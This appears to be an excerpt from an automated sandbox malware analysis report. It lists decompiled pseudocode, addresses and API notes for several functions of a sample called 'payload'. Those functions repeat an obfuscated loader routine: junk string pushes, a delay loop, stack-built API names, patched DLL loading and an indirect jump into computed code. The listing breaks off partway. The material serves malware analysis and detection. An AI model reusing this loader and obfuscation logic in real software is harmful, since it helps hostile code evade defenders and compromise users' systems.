					if(_t21 == 0) {
						goto L17;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t50 =  *_t50 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L17;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t50 =  *_t50 - 1;
						__eflags =  *_t50;
					} while ( *_t50 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t42);
					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
					_t46 = _t42;
					 *0x405002 = _t46 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L17;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L17;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L5;
				}
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L5;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t36) != 0) {
					goto L5;
				}
				_push(0x402b5c);
				return 0x402b5c;
			}




















    0x004016ff
    0x00401701
    0x00401704
    0x00401709
    0x00401715
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040171b
    0x0040171d
    0x00401720
    0x00401725
    0x00401731
    0x00000000
    0x00000000
    0x00401737
    0x00401739
    0x0040173c
    0x00401741
    0x0040174d
    0x00000000
    0x00000000
    0x00401753
    0x00401758
    0x0040175d
    0x0040175f
    0x00401762
    0x00401767
    0x00401773
    0x00000000
    0x00000000
    0x0040177f
    0x00401780

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401784, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 140synchronization
    C-Code - Quality: 47%
    			E00401784() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				intOrPtr* _t38;
				void* _t42;
				void* _t46;
				void* _t48;
				intOrPtr* _t50;

				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L5:
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L17:
						L18:
						goto L18;
					}
					__eflags = _t48 - 0xfd00;
					if(_t48 < 0xfd00) {
						goto L17;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t38 = "pejpCreate";
					 *_t38 = 0x70616548;
					 *((short*)(_t38 + 4)) = 0x7243;
					 *((short*)(_t38 + 6)) = 0x6165;
					_push(_t38);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L17;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t48 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L17;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t50 =  *_t50 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L17;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t50 =  *_t50 - 1;
						__eflags =  *_t50;
					} while ( *_t50 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t42);
					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
					_t46 = _t42;
					 *0x405002 = _t46 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L17;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L17;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push( *0x4050cf);
				_t36 = E00402AD0(_t12);
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t36) != 0) {
					goto L5;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L5;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L5;
				}
				_push(E004011B7);
				return E004011B7;
			}




















    0x00401784
    0x00401786
    0x00401789
    0x0040178e
    0x0040179b
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004017a1
    0x004017a7
    0x004017ac
    0x004017ae
    0x004017b1
    0x004017b6
    0x004017c2
    0x00000000
    0x00000000
    0x004017c8
    0x004017ca
    0x004017cd
    0x004017d2
    0x004017df
    0x00000000
    0x00000000
    0x004017e5
    0x004017e7
    0x004017ea
    0x004017ef
    0x004017fc
    0x00000000
    0x00000000
    0x00401808
    0x00401809

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040193D, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 140synchronization
    C-Code - Quality: 47%
    			E0040193D() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				intOrPtr* _t38;
				void* _t42;
				void* _t46;
				void* _t48;
				intOrPtr* _t50;

				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L5:
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L17:
						L18:
						goto L18;
					}
					__eflags = _t48 - 0xfd00;
					if(_t48 < 0xfd00) {
						goto L17;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t38 = "pejpCreate";
					 *_t38 = 0x70616548;
					 *((short*)(_t38 + 4)) = 0x7243;
					 *((short*)(_t38 + 6)) = 0x6165;
					_push(_t38);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L17;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t48 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L17;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t50 =  *_t50 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L17;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t50 =  *_t50 - 1;
						__eflags =  *_t50;
					} while ( *_t50 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t42);
					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
					_t46 = _t42;
					 *0x405002 = _t46 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L17;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L17;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L5;
				}
				_push( *0x4050cf);
				_t36 = E00402AD0(_t12);
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t36) != 0) {
					goto L5;
				}
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L5;
				}
				_push(E00401FE4);
				return E00401FE4;
			}




















    0x0040193d
    0x0040193f
    0x00401942
    0x00401947
    0x00401953
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401959
    0x0040195b
    0x0040195e
    0x00401963
    0x0040196f
    0x00000000
    0x00000000
    0x00401975
    0x0040197b
    0x00401980
    0x00401982
    0x00401985
    0x0040198a
    0x00401997
    0x00000000
    0x00000000
    0x0040199d
    0x0040199f
    0x004019a2
    0x004019a7
    0x004019b3
    0x00000000
    0x00000000
    0x004019bf
    0x004019c0

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040299E, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 139synchronization
    C-Code - Quality: 46%
    			E0040299E() {
				void* _t11;
				void* _t12;
				void* _t14;
				struct HINSTANCE__* _t18;
				void* _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				void* _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				intOrPtr* _t37;
				void* _t41;
				void* _t45;
				void* _t47;
				intOrPtr* _t49;
				void* _t59;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push(1);
				 *_t49 =  *_t49 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t12) != 0) {
					L1:
					_push(1);
					 *_t49 =  *_t49 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t14 = E00401CAE(_t13); // executed
					if(_t14 != 0 || _t47 < 0xfd00) {
						L13:
						L14:
						goto L14;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t37 = "pejpCreate";
						 *_t37 = 0x70616548;
						 *((short*)(_t37 + 4)) = 0x7243;
						 *((short*)(_t37 + 6)) = 0x6165;
						_push(_t37);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t49 =  *_t49 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						if(_t19 != 0) {
							goto L13;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t47 - 4)) = _t22;
						_push(_t22);
						if(_t22 == 0) {
							goto L13;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t49 =  *_t49 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						if(_t24 != 0) {
							goto L13;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t49 =  *_t49 - 1;
						} while ( *_t49 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t41);
						 *((intOrPtr*)(_t49 + 4)) =  *((intOrPtr*)(_t49 + 4)) +  *((intOrPtr*)(_t41 + 0x3c));
						_t45 = _t41;
						 *0x405002 = _t45 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						_t59 =  *0x405002 - 0xfff;
						if(_t59 > 0) {
							goto L13;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t59 < 0) {
							goto L13;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						if( *((intOrPtr*)(_t47 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push("zzdjjqpqaxlgt");
				__eax = E00402E18(__eax);
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				__eax = E00402E18(__eax);
				_push("zzdjjqpqaxlgt");
				__eax = E00402749;
				_push(E00402749);
				return E00402749;
			}





















    0x0040299e
    0x004029a3
    0x004029a8
    0x004029aa
    0x004029ad
    0x004029b2
    0x004029be
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x004029c4
    0x004029c9
    0x004029ce
    0x004029d0
    0x004029d3
    0x004029d8
    0x004029dd
    0x004029e5
    0x00000000
    0x00000000
    0x004029eb
    0x004029ed
    0x004029f0
    0x004029f5
    0x004029fa
    0x00402a01
    0x00000000
    0x00000000
    0x00402a07
    0x00402a0c
    0x00402a11
    0x00402a1b
    0x00402a21
    0x00402a22

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040274E, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 137synchronization
    C-Code - Quality: 46%
    			E0040274E() {
				void* _t11;
				void* _t13;
				struct HINSTANCE__* _t17;
				void* _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t36;
				void* _t40;
				void* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t58;

				_push(1);
				 *_t48 =  *_t48 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L1:
					_push(1);
					 *_t48 =  *_t48 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					if(_t13 != 0 || _t46 < 0xfd00) {
						L13:
						L14:
						goto L14;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t17 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t17;
						_t36 = "pejpCreate";
						 *_t36 = 0x70616548;
						 *((short*)(_t36 + 4)) = 0x7243;
						 *((short*)(_t36 + 6)) = 0x6165;
						_push(_t36);
						_push(_t17);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t17);
						_push(1);
						 *_t48 =  *_t48 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						if(_t18 != 0) {
							goto L13;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t46 - 4)) = _t21;
						_push(_t21);
						if(_t21 == 0) {
							goto L13;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t22 = E00402E18(_t21); // executed
						_push("true");
						 *_t48 =  *_t48 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t23 = E00402BB3(_t22); // executed
						if(_t23 != 0) {
							goto L13;
						}
						_push(0x1e);
						do {
							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t48 =  *_t48 - 1;
						} while ( *_t48 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t25); // executed
						_pop(_t40);
						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
						_t44 = _t40;
						 *0x405002 = _t44 + 0xa4;
						_t27 =  *0x405002;
						_t28 =  *_t27;
						 *0x405002 = _t28;
						_t58 =  *0x405002 - 0xfff;
						if(_t58 > 0) {
							goto L13;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t58 < 0) {
							goto L13;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t33);
						 *0x40501a =  *0x40501a + _t33;
						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push( *0x4050cf);
				__eax = E00402AD0(__eax);
				_push("zzdjjqpqaxlgt");
				__eax = E00402E18(__eax);
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				__eax = E00402749;
				_push(E00402749);
				return E00402749;
			}




















    0x0040274e
    0x00402750
    0x00402753
    0x00402758
    0x00402765
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
